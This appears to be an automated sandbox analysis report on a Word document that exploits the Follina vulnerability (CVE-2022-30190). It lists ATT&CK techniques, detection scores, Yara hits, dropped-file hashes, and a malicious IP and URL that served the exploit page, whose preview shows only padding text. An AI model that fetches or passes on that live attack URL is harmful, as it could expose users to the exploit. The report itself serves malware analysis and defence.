Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Exploitation for Client Execution	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	11 Non-Standard Port	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	12 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ZDhoKQk8G6.docx	25%	Virustotal		Browse
ZDhoKQk8G6.docx	17%	ReversingLabs	Script-Macro.Exploit.CVE-2017-0199

Name	Source	Malicious	Reputation
https://img1.18183.com/image/20220427/1651040288153109.png	document.xml	false	high
https://img1.18183.com/image/20220427/1651040303449177.png	document.xml	false	high
https://img1.18183.com/image/20220427/1651040297422300.png	document.xml	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
117.48.146.246	unknown	China		4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	645905
Start date and time: 15/06/202207:09:28	2022-06-15 07:09:28 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 20s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	ZDhoKQk8G6.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.expl.evad.winDOCX@1/22@0/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .docx Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
TCP Packets have been reduced to 100
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtSetValueKey calls found.

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.2885388677374342
Encrypted:	false
SSDEEP:	48:I3oocnRBcAVFKPR2ais0luP2N2E9hrQZq46xbATxbA7H:Ko9LjKvP2N2E99Qt6x0Tx07H
MD5:	C86FDD1688DFA14188A34E2FA613D252
SHA1:	EE12F352A8EB013ACD680EAF77177F590D8E1799
SHA-256:	92FE284561709E189C7A95D753BFFDFE5EA788C48E0AFC642FF8ACF4E886EB17
SHA-512:	5AD00B55C195FBA1AFB83648429FB964AF0E76DDB399BA47A3D4E8F56F6D7507A0B8C665C262C7A546093BB5AE31849744FFA2D6BF498CBF110979D82E3DCF65
Malicious:	false
Reputation:	low
Preview:	......M.eFy...zK...FhA....6..&S,...X.F...Fa.q................................sP.D.P.;..............$.l.N.....MD9.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2A40B0AC-ACBB-463B-8DC0-568E01ED388D}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.6757902642554773
Encrypted:	false
SSDEEP:	96:K46Cy3egKDtc1r5vztDz3IdoG9oU8MC+1T0HQYGS:z6WDe1rxhhGjm+uw
MD5:	D97F2CC70A4379260D06D56554D15338
SHA1:	AA791DEB8BDE74815AD14F492E808E3BE2CA33DB
SHA-256:	C16B2099208C3E92051AE581D68C48EACE6C2676FA3D0294C11CFFA4D1296B76
SHA-512:	BF551EBCA42DADD9EFA9D10EECAA907F2B8ABF67DD5F10AFCB5AF98FD226C19848A26AEF80E744592D45AD2A411075008964879CF33DC8E31B0796293BA8DB01
Malicious:	false
Reputation:	low
Preview:	......M.eFy...zk(V.0.O.}.....;S,...X.F...Fa.q..............................._gL.L...li. <........&.0O.D.. &o....S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.939953768708169
Encrypted:	false
SSDEEP:	3:yVlgsRlz8JllVXIlsSllILmnSBSYQJldOJ7lWldFk276:yPblzQwlsSHIKSBS9cJAlk22
MD5:	23C72AAF923FE6C7EA713BC3B6BABE8D
SHA1:	81BE16213DBADA2C88789E63AB577C51035F3D02
SHA-256:	8B119C83E768575DBDAB4CA4C43A5036600340D9D73CA253A000D4EE91651620
SHA-512:	6177F0BDA0D261F5E566137684A750695E9E62B7AE514E1FA9C74E5C78A83BBE6B5DD975BEB907F56BF625C9AC8F1E531952C5EBF6B68E0169C0A64E4612AB75
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.2.A.4.0.B.0.A.C.-.A.C.B.B.-.4.6.3.B.-.8.D.C.0.-.5.6.8.E.0.1.E.D.3.8.8.D.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28920165154806665
Encrypted:	false
SSDEEP:	48:I3NRBK1cjGmLVnNyw5T5iYlbxQ/rJmAS5REAS5RLH:KNLNJxQTJTotoLH
MD5:	5D8DC4451C809A7288A70F0310BAFB79
SHA1:	9BB56FEF0EC78307F10DCE7E9C75C353A8312CC5
SHA-256:	4A7FDAD115C3C0982E5200F719C349B7F6C95415B35FF7ED9B18A4DFD6CFA143
SHA-512:	DE9B179EDB9C7D520F1C0AD968B1BA6F29C483CFEBB91A826C66CA1CD78ACEE277756E0FB4B66490534EDBB81BEAFAF97A7FF8B132BABC9DD6AE4FB0A0AB6E27
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z...q..K.t..z...S,...X.F...Fa.q...............................Fo.HM..~..:.8.........2....'G.....e...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{4FD4A456-B142-48A7-8A26-7CC29A810637}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.22189153735687875
Encrypted:	false
SSDEEP:	48:I3mEMRUrB1alSOwjXq7mdS/BVDIW6fbfzIssfbr1q3oDq3ok:KmRRCftjsJqQs8bM
MD5:	7453904A6FC41F31B5CF58B64E84E111
SHA1:	525EB1FFC638888B18CC1DF87D46B1B7B11E51C9
SHA-256:	5E68DD6840E40B8DEC61403C1C786857E02A22A05C399B941B13CED14BFC3A4D
SHA-512:	E8D8AFDF2243BDEDCDFBB45DE3FAA0999A870DF34776F34E4D12E4AAA00700FB8A747AA1A1949FA3955759150407B6C85304E888E70FF4364FD02BECC5BE551C
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.....P.F.."...$.S,...X.F...Fa.q...............................{5.mH...D.................qE...P./t.P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...\|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.9660980668778723
Encrypted:	false
SSDEEP:	3:yVlgsRlzF6R+UOLNvIWnsZ3lMp0276:yPblzkUZIWrp022
MD5:	E435FF41580D4AF52534CED5213A06DE
SHA1:	D9D9501DB59405B4BD62FECC2C67AF0DA7B80AFE
SHA-256:	8C91DC89D9CC105BB8B3BA9CA0A156FC559EAD5A5C8546D86D6F3BDFEB14ED1B
SHA-512:	F7C65AB2F7331A78093B2E73B425F8253A97EE32E3CAF150F880F2FAEC7C06F8E1F3EADC74E13D7E6BAFD9FE54A70DFE4BBF89B5C7A4B518B8981F1EE3670233
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.4.F.D.4.A.4.5.6.-.B.1.4.2.-.4.8.A.7.-.8.A.2.6.-.7.C.C.2.9.A.8.1.0.6.3.7.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	5982
Entropy (8bit):	4.758638141931997
Encrypted:	false
SSDEEP:	96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG
MD5:	7F4B47B5BE4DF743220DDA8F5595909A
SHA1:	5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54
SHA-256:	2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7
SHA-512:	E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB
Malicious:	true
Yara Hits:	Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm, Author: Joe Security Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm, Author: Joe Security
Reputation:	low
IE Cache URL:	http://117.48.146.246:8008/exploit.htm
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\exploit[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	5982
Entropy (8bit):	4.758638141931997
Encrypted:	false
SSDEEP:	96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG
MD5:	7F4B47B5BE4DF743220DDA8F5595909A
SHA1:	5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54
SHA-256:	2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7
SHA-512:	E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB
Malicious:	false
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722BFA5.htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	5982
Entropy (8bit):	4.758638141931997
Encrypted:	false
SSDEEP:	96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG
MD5:	7F4B47B5BE4DF743220DDA8F5595909A
SHA1:	5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54
SHA-256:	2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7
SHA-512:	E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB
Malicious:	true
Yara Hits:	Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722BFA5.htm, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722BFA5.htm, Author: Joe Security
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7341AC3F.htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	5982
Entropy (8bit):	4.758638141931997
Encrypted:	false
SSDEEP:	96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG
MD5:	7F4B47B5BE4DF743220DDA8F5595909A
SHA1:	5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54
SHA-256:	2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7
SHA-512:	E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB
Malicious:	true
Yara Hits:	Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7341AC3F.htm, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7341AC3F.htm, Author: Joe Security
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B14BFC0.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PNG image data, 500 x 265, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	251976
Entropy (8bit):	7.994452839001206
Encrypted:	true
SSDEEP:	6144:Y0ai6s7Sg8tWib0g5m+yHcsgiFi5XGfJsZ9Or4:Y0b1w0llHcsgnXKazOr4
MD5:	DFC62C64626F11E01A29203C6BFAC296
SHA1:	E418EF6561DDC24CD62D47ED131713B922871363
SHA-256:	2C71BFD99AD8A748954CC840174C3851386001F40312D2B8956019801357B2F1
SHA-512:	A9B568AA135D67F3E2DEEAFACB137EF3EDBC09095214EDF49810EA2736DF60FD3D10067BBE42126F60018C5C9284ABF08B1A1719EE06471F72B003E5BF58F437
Malicious:	false
Preview:	.PNG........IHDR.............b..M....IDATx^..W.e..._v.}L..."...5m.....$=.E.....I.0.{...G#.z......X."..o.]V.E..{...m@qk..6222"....~.I}rr..,..A.0.UU.. PU....C..........(T....8..$.j...Y.u<...UV..osrxy....XA%...:.U.T,U...\kK[).A...~...=."{.&a..7.....\|..0Pe.Ka.+.J.u.n..Z,...O.....\I.UV..w:...i...#......(.....@V..tG.0.y.)W...e.....wwU,j....0."......u(.,..g..Y.....j.h.X.2WQ.6N....C..w..w]..m..P.N...v.....D.......m.[...5...u...n.....\|Z ..R.......\|'......g....,.....Y9.&o\\U......M&.={.L/_...+...U.84^"}.w.6..Ra...$?.'@.a.....;......l.....::........,,.<@.\|.....-...v.m.}...\./. ...V....G."xE+.m..w........:WE......B7n....~.o..\|..>o..._YWF...3........-..e......o?KzVY....A...T.........P4.q..Z..Zu.._.Y.V}h.....o....k.!a...G......`I4....C\Qz\MR.n....t..\E.)/3!..#)RY;>....b..N.}]....u...d......Z,2Uu.8NL.......#.M.s.!.....E*.5m=..../kK.,....TW.;..w....h...........:>>.......!"Q9.a;c.qu...w..T..;...(.#J.(t...&.:......$.O...S..B.'.B...\|..-.2.W..g..`.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F20135FB.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PNG image data, 493 x 237, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	184356
Entropy (8bit):	7.989908339576132
Encrypted:	false
SSDEEP:	3072:jUKT4LKebSEdyKTPq2ElM4wHU5YDv4QUYKoxkX0gg4HS+NcqGTtji1f+2Z+pyl3/:wzLKebS0hzqnM4wHguUYJxWvqD8P+slP
MD5:	C02C455F5D77DF5AE8B9F638C8EF8854
SHA1:	F3F8C9A5C20DABDD1FE99D05197F6D11BA9484AF
SHA-256:	5E07AC7BFE2C65429ACDBD281C0E9B92F5A382E4FFF699741E8D085F7EAD17DE
SHA-512:	10FBE8D48F22E26250206B84F2C4D3220C8E8FDC622FD33576A796856CFAAA467F6D5F9DD87AFE9DE242FB8EEA27F6E13A743B8231F932FF494E88C710EC86F9
Malicious:	false
Preview:	.PNG........IHDR...............-O....IDATx^..Y.d.q....+......hlDc.w..NJ.Q...H.....a.~.}.....g..lf4.kc....n @. v...{u..g.3..GxfTv5....qb.....X...3O=^Y.....V.e.....v....` .8+.=;dY.G\0..y.@....lZe3....$.h4..l&..s.FV.......yS.p...,...?...9.L...p....Z..@>w....etp........rj$!.rZx..>....#.6t.a...=..s.....yL.E...~.+...+.@.y...EY..o.....=.F.,....Ef......+..\.x.D....J..e.....Y$.h4.&..P..A..2...^...=.t..?..8.....IeK...!Y$...@YUV..%G.K.....C=/T..Q..h:.z.../T....d...!.....G....h.P7..i..8O.u~'.a....\..EZ\.t:.3T.............q..N.Q..y....P.....1"@.<....-.vS.bC.GZ.W..=.C..(..].qe..f.n.6.2..(m...+?.\|VYV.,+g6..n..,o5l..F^Xm..&...&...EM.@.....V.r......ft..rU.E.....P..z:.2'.}...S...l4..x<V.<...x....].._"?..]. 4@.p.-Y./.5Wl1..B..Q..x..-.^.K.?;.~h......;............0q<........@..w.\|<...?..R.....#.C....Y-.....z...?..qp,.%?i...uT.!.T. ...G;._./H.#@.e.....\.31..e.RH'-.../..k-l..q......p..x.e...e.ztV.C.m./...E.`.k..........A..N.2.e.SpZ)?.6..B?E..SdCZ/..e.jt..AG...X(`o.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	2.193154020020311
Encrypted:	false
SSDEEP:	24:rOheRLp07US2GRXhR1iUtbtE1sR1i72GRXhbhMi72GRXI:riD24X1iS51i724Vqi724
MD5:	47DE66F0D409B5DCA1C5A74F93197E3B
SHA1:	E2F2B6C4C25C531C9247509D900D09FAFFD7CCC3
SHA-256:	BDBF2FA4C228CB0038E3D3D5D63BE3D445C1CF19774AC7F7BAB5B31CD3DECDBD
SHA-512:	4755E1DBE64B77022440CFA730204DC9CDD7D34558CA98F428315A008E7B72498A55445BB1B4C8D5F24F2C19C6592EE09FA15DFD301A5CD3926C9D0F5387731C
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0F1199C9-FFD7-4240-8F04-53D52631A074}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:X:X
MD5:	32649384730B2D61C9E79D46DE589115
SHA1:	053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
SHA-256:	E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
SHA-512:	A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3D2E09D-939E-4CE8-8CEF-3005BD062461}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2828
Entropy (8bit):	5.711486827536375
Encrypted:	false
